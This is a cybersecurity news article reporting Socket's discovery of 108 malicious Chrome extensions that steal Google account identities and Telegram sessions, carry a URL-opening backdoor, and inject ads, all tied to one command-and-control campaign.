Over 20,000 users installed malicious Chrome extensions designed to provide a backdoor, steal information, or inject ads, cybersecurity firm Socket reports.
The nefarious extensions have been published using five different accounts, namely GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project, but appear to be part of a single, coordinated campaign, based on shared command-and-control (C&C) infrastructure.
Socket identified 108 extensions performing various types of malicious activities. Half of them were designed to steal Google accounts via OAuth2, and 45 were injected with a universal backdoor that opens arbitrary URLs when the browser starts.
The remaining extensions were designed to exfiltrate Telegram sessions, inject ads into YouTube and TikTok pages, inject content scripts into all visited pages, or to proxy translation requests through an attacker-controlled server.
“The 108 extensions are published across several product categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. Each targets a different type of user, but all share the same backend,” Socket says.
The extensions provide the expected functionality to avoid raising suspicion, but malicious code running in the background connects to the threat actor’s C&C to perform the nefarious activities.
Socket draws attention to the Telegram Multi-account extension, which steals the active Telegram Web session and allows the attackers to take over the user account by overwriting the local storage with attacker-supplied data and force-reloading Telegram.
Another extension, Web Client for Telegram – Teleside, can steal sessions and has a backdoor in the background script that allows the operators to activate a payload directly, without updating the application through the Chrome Web Store.
The 54 extensions that can steal users’ Google accounts at login contain identical code to acquire a Google OAuth2 Bearer token, use it to fetch user information, and send the data to a remote server.
“The OAuth token is used locally and never leaves the browser. What reaches the operator’s server is only a permanent identity record: the victim’s email, name, and profile picture,” Socket explains.
The background script of 45 extensions contains an identical function that, upon browser start, opens a URL received from the C&C in a new tab.
“There is no restriction on what URL the server can return. This channel survives browser restarts and operates independently of whether the user ever opens the extension,” Socket notes.
The cybersecurity firm says it reported all the malicious extensions, but they were not immediately removed from the Chrome Web Store.
Related: Over 300 Malicious Chrome Extensions Caught Leaking or Stealing User Data
Related: Chrome, Edge Extensions Caught Stealing ChatGPT Sessions
Related: Malicious Chrome Extension Crashes Browser in ClickFix Variant ‘CrashFix’
Related: Chrome Extensions With 900,000 Downloads Caught Stealing AI Chats
